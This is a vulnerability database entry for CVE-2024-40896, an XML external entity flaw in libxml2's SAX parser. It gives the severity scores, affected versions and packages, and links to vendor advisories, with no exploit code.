CVE-2024-40896

CWE-611XML External Entity (XXE)11 documents9 sources
Severity
9.1CRITICAL
EPSS
0.6%
top 31.95%
CISA KEV
Not in KEV
Exploit
No known exploits
Affected products
2
Libxml2 Libxml2Xmlsoft Libxml2
Timeline
PublishedDec 23
Latest updateApr 15

Description

In libxml2 2.11 before 2.11.9, 2.12 before 2.12.9, and 2.13 before 2.13.3, the SAX parser can produce events for external entities even if custom SAX handlers try to override entity content (by setting "checked"). This makes classic XXE attacks possible.

CVSS vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:HExploitability: 3.9 | Impact: 5.2

Affected Packages3 packages

CVEListV5libxml2/libxml22.11.02.11.9+2
NVDxmlsoft/libxml22.11.02.11.9+2
Ubuntulibxml2< 2.12.7+dfsg-3ubuntu0.1

🔴Vulnerability Details

3
GHSA
GHSA-6c2p-rqx3-w4px: In libxml2 22024-12-23
OSV
CVE-2024-40896: In libxml2 22024-12-23
CVEList
CVE-2024-40896: In libxml2 22024-12-23

📋Vendor Advisories

7
Oracle
Oracle Oracle Communications Applications Risk Matrix: Core (libxml2) — CVE-2024-408962025-04-15
Ubuntu
libxml2 vulnerability2025-01-16
Red Hat
libxml2: XXE vulnerability2024-12-23
Microsoft
In libxml2 2.11 before 2.11.9, 2.12 before 2.12.9, and 2.13 before 2.13.3, the SAX parser can produce events for external entities even if custom SAX handlers try to override entity content (by settin2024-12-10
Oracle
Oracle Oracle Communications Risk Matrix: Install/Upgrade (Pygments) — CVE-2022-408962024-04-15
CVE-2024-40896 (CRITICAL CVSS 9.1) | In libxml2 2.11 before 2.11.9 | cvebase.io